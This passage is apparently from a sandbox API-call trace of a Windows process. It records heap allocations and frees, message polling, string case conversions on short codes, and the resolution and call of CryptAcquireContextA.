hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.437] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0206.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.438] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0206.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.439] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.439] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0206.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0206.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.441] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0206.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0206.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466db0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0206.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.442] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0206.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3688 | out: hHeap=0x25c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.442] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0206.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0206.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.445] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.446] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.446] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0206.446] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.446] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0206.446] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.446] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0206.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.447] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.447] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.447] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.447] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.447] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0206.447] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.447] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.448] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0206.448] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.448] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.448] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.448] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.448] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.448] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.448] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.449] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0206.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0206.449] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0206.449] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.449] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.450] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0206.450] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.450] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0206.450] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0206.450] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0206.450] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0206.450] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.450] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0206.451] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0206.451] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0206.451] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.451] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0206.451] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.451] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 